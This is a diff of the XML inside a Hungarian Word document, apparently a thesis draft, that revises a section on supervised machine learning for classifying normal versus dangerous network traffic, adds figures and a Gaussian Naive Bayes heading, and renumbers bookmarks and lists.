         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mi a felügyelt tanulás?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Hogyan működik a felügyelt tanulás?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Felügyelt tanulási algoritmusok (7)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>F</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>elügyelt tanulás során c</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulás során c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7241,13 +8191,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ez a típusú</w:t>
+        <w:t xml:space="preserve"> Ez a típusú</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7259,13 +8203,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozás</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a által.</w:t>
+        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozása által.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7274,9 +8212,389 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Általánosságban a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gépi tanulás felépítésének négy alapvető lépése van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Az első a tanuló adatok gyűjtése és előkészítése. A konkrét példák gyűjtése után előkészítéskor a példák két részhalmazba kerülnek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felügyelt tanulás során</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „test”. A címkézett adatok („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”) az algoritmus tanítására szolgálnak. Hálózati </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>biz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tonsági kontextusban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a két címke – a fenti példából adódóan – a normál és a veszélyes adatforgalom. A nem címkézett adatokat („test”) az algoritmus önállóan címkézi fel, ezzel tesztelve, hogy a megállapítása jó-e vagy rossz. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A második és harmadik lépés az algoritmus kiválasztása és annak betanítása. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az algoritmus típusa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> többek között</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függ a képzési adatkészlet típusától</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az adatok mennyiségétől, valamint a megoldandó probléma típusától.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az algoritmus oktatása iteratív folyamat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>magában foglalja a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az így kapott betanított, pontos algoritmus a gépi tanulási modell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az utolsó lépés a modell új adatokkal történő felhasználása</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A felügyelt gépi tanulási folyamatokban különféle algoritmusokat és számítási technikákat alkalmaznak.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEA9450" wp14:editId="1DD0A883">
+            <wp:extent cx="5040000" cy="2431387"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
+            <wp:docPr id="2" name="Kép 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5040000" cy="2431387"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C494A7F" wp14:editId="7C0E4FC6">
+            <wp:extent cx="5040000" cy="2431387"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
+            <wp:docPr id="5" name="Kép 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5040000" cy="2431387"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7291,11 +8609,24 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc71020000"/>
-      <w:r>
-        <w:t>Naive Bayes</w:t>
+      <w:bookmarkStart w:id="14" w:name="_Toc71124915"/>
+      <w:r>
+        <w:t xml:space="preserve">Gaussian </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="14"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7308,11 +8639,115 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C0F698" wp14:editId="652ADBD7">
+            <wp:extent cx="3600000" cy="2699894"/>
+            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
+            <wp:docPr id="6" name="Kép 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Kép 6"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3600000" cy="2699894"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E969CC9" wp14:editId="7174F277">
+            <wp:extent cx="3600000" cy="2699894"/>
+            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
+            <wp:docPr id="8" name="Kép 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Kép 8"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3600000" cy="2699894"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7332,7 +8767,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc71020001"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc71124916"/>
       <w:r>
         <w:t>PROGRAM FELÉPÍTÉSE</w:t>
       </w:r>
@@ -7363,7 +8798,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc71020002"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc71124917"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
@@ -7422,7 +8857,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc71020003"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc71124918"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7485,7 +8920,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc71020004"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc71124919"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7670,7 +9105,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc71020005"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc71124920"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7705,9 +9140,9 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId11"/>
-      <w:footerReference w:type="default" r:id="rId12"/>
-      <w:headerReference w:type="first" r:id="rId13"/>
+      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId16"/>
+      <w:headerReference w:type="first" r:id="rId17"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -8191,6 +9626,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="17BF25FD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="196484A2"/>
+    <w:lvl w:ilvl="0" w:tplc="040E000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="17CE79CB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4490A8CE"/>
@@ -8303,7 +9824,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1FAF21C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6C0A3C60"/>
@@ -8425,7 +9946,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20A815F0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A81EF0F2"/>
@@ -8538,7 +10059,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="316417F3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AE74433C"/>
@@ -8679,7 +10200,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36260C9A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="25662176"/>
@@ -8792,7 +10313,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61BF323C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA52E50E"/>
@@ -8905,7 +10426,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -9018,7 +10539,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -9135,34 +10656,37 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="0"/>
   </w:num>
